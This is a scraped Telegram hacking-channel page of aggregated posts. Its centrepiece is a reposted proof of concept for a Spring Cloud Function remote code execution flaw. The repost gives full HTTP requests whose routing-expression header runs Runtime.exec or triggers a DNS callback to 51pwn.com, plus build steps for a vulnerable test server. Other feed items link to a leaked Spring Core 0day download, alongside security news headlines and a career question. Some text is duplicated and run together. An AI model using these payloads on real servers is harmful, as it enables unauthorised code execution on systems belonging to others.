Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.6K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
poc2 POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5

51pwn
check curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'

Download Spring-Spel-0Day-Poc (https://github.com/hktalent/spring-spel-0day-poc)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") buildwget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 get path lists for testfind . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'...
functionRouter
uppercase
lowercase
...
https://blogger.googleusercontent.com/img/a/AVvXsEjtT9tOIFERen-o92zVmjjMGrU1VOsjB44JvIq42soyvpxuwfmuHffXKZAWoLyZ2KgTDa4o-3ynuNGcSpeyScgkULF0Zbwis8was14Oze1LIyUTsSUO0VGLLZmhILqpB8ryv5WQP8sh49lpZ-jjT2UsYUqAzwK5RQcW03bkmEPZMX84rElqKMVyPjOG=w640-h454 poc1Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Connection: close spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app") Content-Length: 5 51pwn">POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5

51pwn
https://blogger.googleusercontent.com/img/a/AVvXsEj5NTmUaoLsPRLc1J6VS3Etx_6N4CPx0m99McBLfeTbKonpluWT9rXgrKeCtfLg5_ADWcEju6z03vTCDzUc2cu2QuhPeKM_J7MGnFm8w14LGY-sOkVIdOcPVvsL8ERnd_fSk8OEYsWXRx_tMu_x1EwvL7UbhUZ8hYJrya0j-PKJ_8H5psLQr8DZBFNy=w640-h322 poc2POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5

51pwn
checkcurl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'Download Spring-Spel-0Day-Poc
hacking: security in practice
geo location

Is it possible to find an exact geo location without working with an (isp)

submitted by /u/kami-zx2
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.

* https://twitter.com/vxunderground/status/1509170582469943303
* https://github.com/craig/SpringCore0day

A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.

We have not verified the exploit.

tl;dr big if true

Download the 0day POC here: https://share.vx-underground.org

submitted by /u/DrinkMoreCodeMore
[link] [comments]
Dark Reading: Attacks/Breaches
Companies Going to Greater Lengths to Hire Cybersecurity Staff

The cybersecurity market is red-hot. But with so many still-unfilled positions, companies may be more willing to bend or break some hiring rules.
Dark Reading: Attacks/Breaches
Ransomware: Should Companies Ever Pay Up?

Ransomware is a major threat, and no business is "too small to target." So what should you do after an attack? Is negotiating with criminals ever the answer?
Dark Reading: Attacks/Breaches
Spring Fixes Zero-Day Vulnerability in Framework and Spring Boot

The exploit requires a specific nonstandard configuration to work, limiting the danger it poses, but future research could turn up more broadly usable attacks.
Dark Reading: Attacks/Breaches
Vulnerabilities in Rockwell Automation PLCs Could Enable Stuxnet-Like Attacks

CISA urges organizations using affected technologies to implement recommended mitigation measures.
Shifting Resume for PenTesting Career
https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/

Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming months. I was curious if you guys knew of some good resources, templates, etc. to groom my resume to be best geared towards being hired as a pentester. I think with all the learning material (HackTheBox, TryHackMe, Bug Bounties, etc), it makes it a unique situation on how to structure my resume. Any recommendations, resources, advice is greatly appreciated! Thanks guys! submitted by /u/kevinj895 (https://www.reddit.com/user/kevinj895)
[link] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/) [comments] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/)

___________________________
@hacking_Attack
@Hacking_Video